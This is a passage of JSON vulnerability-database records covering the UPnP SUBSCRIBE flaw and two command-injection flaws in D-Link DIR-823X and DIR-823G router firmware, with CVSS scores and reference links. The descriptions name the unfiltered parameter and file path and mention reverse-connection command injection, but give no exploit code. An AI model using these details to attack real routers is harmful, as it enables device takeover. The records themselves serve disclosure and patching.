"url": "https://packetstormsecurity.com/files/162672/red-hat-security-advisory-2021-1789-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021122905"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0417"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3160/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2733/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1382"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159172/ubuntu-security-notice-usn-4494-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.4315.2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0575"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2705/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.4315/"
},
{
"trust": 0.6,
"url": "https://www.huawei.com/cn/psirt/security-advisories/huawei-sa-20200701-01-upnp-cn"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/161288/ubuntu-security-notice-usn-4722-1.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/upnp-information-disclosure-via-subscribe-delivery-url-32701"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0326"
},
{
"trust": 0.2,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.2,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28926"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-27803"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/wpa"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/minidlna"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12695"
},
{
"trust": 0.1,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.4_release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:1789"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/gupnp/1.2.3-0ubuntu0.20.04.1"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/4494-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/minidlna/1.2.1+dfsg-1ubuntu0.18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/minidlna/1.2.1+dfsg-1ubuntu0.20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/minidlna/1.1.5+dfsg-2ubuntu0.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/minidlna/1.2.1+dfsg-2ubuntu0.1"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/4722-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/wpa/2.4-0ubuntu6.7"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/wpa/2:2.9-1ubuntu8.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/wpa/2:2.6-15ubuntu2.7"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/wpa/2:2.9-1ubuntu4.2"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/4734-1"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#339275"
},
{
"db": "VULHUB",
"id": "VHN-165399"
},
{
"db": "PACKETSTORM",
"id": "169049"
},
{
"db": "PACKETSTORM",
"id": "168951"
},
{
"db": "PACKETSTORM",
"id": "162672"
},
{
"db": "PACKETSTORM",
"id": "159172"
},
{
"db": "PACKETSTORM",
"id": "161288"
},
{
"db": "PACKETSTORM",
"id": "161397"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-597"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006708"
},
{
"db": "NVD",
"id": "CVE-2020-12695"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "CERT/CC",
"id": "VU#339275",
"ident": null
},
{
"db": "VULHUB",
"id": "VHN-165399",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2020-12695",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169049",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168951",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162672",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159172",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "161288",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "161397",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202006-597",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006708",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2020-12695",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2020-06-08T00:00:00",
"db": "CERT/CC",
"id": "VU#339275",
"ident": null
},
{
"date": "2020-06-08T00:00:00",
"db": "VULHUB",
"id": "VHN-165399",
"ident": null
},
{
"date": "2020-06-08T00:00:00",
"db": "VULMON",
"id": "CVE-2020-12695",
"ident": null
},
{
"date": "2021-04-28T19:12:00",
"db": "PACKETSTORM",
"id": "169049",
"ident": null
},
{
"date": "2020-12-28T20:12:00",
"db": "PACKETSTORM",
"id": "168951",
"ident": null
},
{
"date": "2021-05-19T14:10:26",
"db": "PACKETSTORM",
"id": "162672",
"ident": null
},
{
"date": "2020-09-15T17:05:32",
"db": "PACKETSTORM",
"id": "159172",
"ident": null
},
{
"date": "2021-02-04T21:34:49",
"db": "PACKETSTORM",
"id": "161288",
"ident": null
},
{
"date": "2021-02-12T17:29:06",
"db": "PACKETSTORM",
"id": "161397",
"ident": null
},
{
"date": "2020-06-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202006-597",
"ident": null
},
{
"date": "2020-07-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-006708",
"ident": null
},
{
"date": "2020-06-08T17:15:09.973000",
"db": "NVD",
"id": "CVE-2020-12695",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2020-07-08T00:00:00",
"db": "CERT/CC",
"id": "VU#339275",
"ident": null
},
{
"date": "2021-04-23T00:00:00",
"db": "VULHUB",
"id": "VHN-165399",
"ident": null
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2020-12695",
"ident": null
},
{
"date": "2023-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202006-597",
"ident": null
},
{
"date": "2020-07-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-006708",
"ident": null
},
{
"date": "2024-11-21T05:00:05.367000",
"db": "NVD",
"id": "CVE-2020-12695",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "159172"
},
{
"db": "PACKETSTORM",
"id": "161288"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-597"
}
],
"trust": 0.8
},
"title": {
"_id": null,
"data": "Universal Plug and Play (UPnP) SUBSCRIBE can be abused to send traffic to arbitrary destinations",
"sources": [
{
"db": "CERT/CC",
"id": "VU#339275"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202006-597"
}
],
"trust": 0.6
}
}
VAR-202509-3918
Vulnerability from variot - Updated: 2026-03-09 23:52An issue was discovered in DIR-823 firmware 20250416. There is an RCE vulnerability in the set_cassword settings interface, as the http_casswd parameter is not filtered by '&'to allow injection of reverse connection commands. D-Link Corporation of DIR-823X Firmware contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DIR-823X is a wireless router from D-Link, a Chinese company. An attacker could exploit this vulnerability to cause code execution
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202509-3918",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-823x",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "250416"
},
{
"model": "dir-823x",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-823x",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dir-823x firmware 2025-04-16"
},
{
"model": "dir-823x",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-823x",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "20250416"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-23466"
},
{
"db": "JVNDB",
"id": "JVNDB-2025-015190"
},
{
"db": "NVD",
"id": "CVE-2025-55848"
}
]
},
"cve": "CVE-2025-55848",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2025-23466",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2025-55848",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2025-015190",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2025-55848",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "OTHER",
"id": "JVNDB-2025-015190",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2025-23466",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-23466"
},
{
"db": "JVNDB",
"id": "JVNDB-2025-015190"
},
{
"db": "NVD",
"id": "CVE-2025-55848"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered in DIR-823 firmware 20250416. There is an RCE vulnerability in the set_cassword settings interface, as the http_casswd parameter is not filtered by \u0027\u0026\u0027to allow injection of reverse connection commands. D-Link Corporation of DIR-823X Firmware contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DIR-823X is a wireless router from D-Link, a Chinese company. An attacker could exploit this vulnerability to cause code execution",
"sources": [
{
"db": "NVD",
"id": "CVE-2025-55848"
},
{
"db": "JVNDB",
"id": "JVNDB-2025-015190"
},
{
"db": "CNVD",
"id": "CNVD-2025-23466"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2025-55848",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2025-015190",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2025-23466",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-23466"
},
{
"db": "JVNDB",
"id": "JVNDB-2025-015190"
},
{
"db": "NVD",
"id": "CVE-2025-55848"
}
]
},
"id": "VAR-202509-3918",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-23466"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-23466"
}
]
},
"last_update_date": "2026-03-09T23:52:25.566000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.0
},
{
"problemtype": "Command injection (CWE-77) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2025-015190"
},
{
"db": "NVD",
"id": "CVE-2025-55848"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://github.com/meigui637/iot_zone/blob/main/%e5%91%bd%e4%bb%a4%e6%89%a7%e8%a1%8c%e6%bc%8f%e6%b4%9e.md"
},
{
"trust": 1.8,
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2025-55848"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-23466"
},
{
"db": "JVNDB",
"id": "JVNDB-2025-015190"
},
{
"db": "NVD",
"id": "CVE-2025-55848"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2025-23466"
},
{
"db": "JVNDB",
"id": "JVNDB-2025-015190"
},
{
"db": "NVD",
"id": "CVE-2025-55848"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-10-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-23466"
},
{
"date": "2025-10-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2025-015190"
},
{
"date": "2025-09-26T17:15:36.353000",
"db": "NVD",
"id": "CVE-2025-55848"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-10-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-23466"
},
{
"date": "2025-10-07T01:37:00",
"db": "JVNDB",
"id": "JVNDB-2025-015190"
},
{
"date": "2026-03-09T15:18:06.967000",
"db": "NVD",
"id": "CVE-2025-55848"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Corporation\u00a0 of \u00a0DIR-823X\u00a0 Command injection vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2025-015190"
}
],
"trust": 0.8
}
}
VAR-202511-1190
Vulnerability from variot - Updated: 2025-12-20 23:39A command injection vulnerability exists in the D-Link DIR-823G router firmware DIR823G_V1.0.2B05_20181207.bin in the timelycheck and sysconf binaries, which process the /tmp/new_qos.rule configuration file. The vulnerability occurs because parsed fields from the configuration file are concatenated into command strings and executed via system() without any sanitization. An attacker with write access to /tmp/new_qos.rule can execute arbitrary commands on the device. D-Link Corporation of DIR-823G Firmware contains a command injection vulnerability.Information may be obtained and information may be tampered with. The D-Link DIR-823G is a wireless router manufactured by D-Link, a Chinese company
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202511-1190",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-823g",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.0.2b05_20181207"
},
{
"model": "dir-823g",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-823g",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-823g",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dir-823g firmware 1.0.2b05 20181207"
},
{
"model": "dir-823g dir823g v1.0.2b05 20181207.bin",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-30949"
},
{
"db": "JVNDB",
"id": "JVNDB-2025-019458"
},
{
"db": "NVD",
"id": "CVE-2025-60675"
}
]
},
"cve": "CVE-2025-60675",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CNVD-2025-30949",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2025-60675",
"impactScore": 2.5,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "OTHER",
"availabilityImpact": "None",
"baseScore": 5.4,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "JVNDB-2025-019458",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2025-60675",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "OTHER",
"id": "JVNDB-2025-019458",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2025-30949",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-30949"
},
{
"db": "JVNDB",
"id": "JVNDB-2025-019458"
},
{
"db": "NVD",
"id": "CVE-2025-60675"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A command injection vulnerability exists in the D-Link DIR-823G router firmware DIR823G_V1.0.2B05_20181207.bin in the timelycheck and sysconf binaries, which process the /tmp/new_qos.rule configuration file. The vulnerability occurs because parsed fields from the configuration file are concatenated into command strings and executed via system() without any sanitization. An attacker with write access to /tmp/new_qos.rule can execute arbitrary commands on the device. D-Link Corporation of DIR-823G Firmware contains a command injection vulnerability.Information may be obtained and information may be tampered with. The D-Link DIR-823G is a wireless router manufactured by D-Link, a Chinese company",
"sources": [
{
"db": "NVD",
"id": "CVE-2025-60675"
},
{
"db": "JVNDB",
"id": "JVNDB-2025-019458"
},
{
"db": "CNVD",
"id": "CNVD-2025-30949"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2025-60675",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2025-019458",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2025-30949",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-30949"
},
{
"db": "JVNDB",
"id": "JVNDB-2025-019458"
},
{
"db": "NVD",
"id": "CVE-2025-60675"
}
]
},
"id": "VAR-202511-1190",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-30949"
}
],
"trust": 1.17772434
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-30949"
}
]
},
"last_update_date": "2025-12-20T23:39:53.806000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.0
},
{
"problemtype": "Command injection (CWE-77) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2025-019458"
},
{
"db": "NVD",
"id": "CVE-2025-60675"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "http://d-link.com"
},
{
"trust": 1.8,
"url": "https://github.com/yifan20020708/sgtaint-0-day/blob/main/dlink/dlink-dir-823g/cve-2025-60675.md"
},
{
"trust": 1.8,
"url": "https://www.dlink.com/en"
},
{
"trust": 1.8,
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2025-60675"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-30949"
},
{
"db": "JVNDB",
"id": "JVNDB-2025-019458"
},
{
"db": "NVD",
"id": "CVE-2025-60675"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2025-30949"
},
{
"db": "JVNDB",
"id": "JVNDB-2025-019458"
},
{
"db": "NVD",
"id": "CVE-2025-60675"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-12-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-30949"
},
{
"date": "2025-11-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2025-019458"
},
{
"date": "2025-11-13T19:15:48.420000",
"db": "NVD",
"id": "CVE-2025-60675"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-12-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-30949"
},
{
"date": "2025-11-19T07:35:00",
"db": "JVNDB",
"id": "JVNDB-2025-019458"
},
{
